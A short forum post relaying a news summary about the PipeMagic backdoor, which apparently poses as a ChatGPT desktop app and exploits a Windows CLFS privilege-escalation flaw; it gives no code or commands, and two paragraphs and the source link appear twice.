PipeMagic Malware Imitates ChatGPT App to Exploit Windows Vulnerability and Deploy Ransomware
Posted: Sun Aug 24, 2025 7:53 am
The PipeMagic malware, which is credited to the financially motivated threat actor Storm-2460, is a remarkable illustration of how cyber dangers are always changing. It poses as the genuine open-source ChatGPT Desktop Application from GitHub.
This sophisticated modular backdoor facilitates targeted attacks by exploiting CVE-2025-29824, an elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS).
Microsoft Threat Intelligence identified PipeMagic during investigations into attack chains where adversaries used certutil to download a malicious MSBuild file from compromised legitimate websites, leading to in-memory execution of the backdoor.
https://gbhackers.com/pipemagic-malware ... atgpt-app/
This sophisticated modular backdoor facilitates targeted attacks by exploiting CVE-2025-29824, an elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS).
Microsoft Threat Intelligence identified PipeMagic during investigations into attack chains where adversaries used certutil to download a malicious MSBuild file from compromised legitimate websites, leading to in-memory execution of the backdoor.
https://gbhackers.com/pipemagic-malware ... atgpt-app/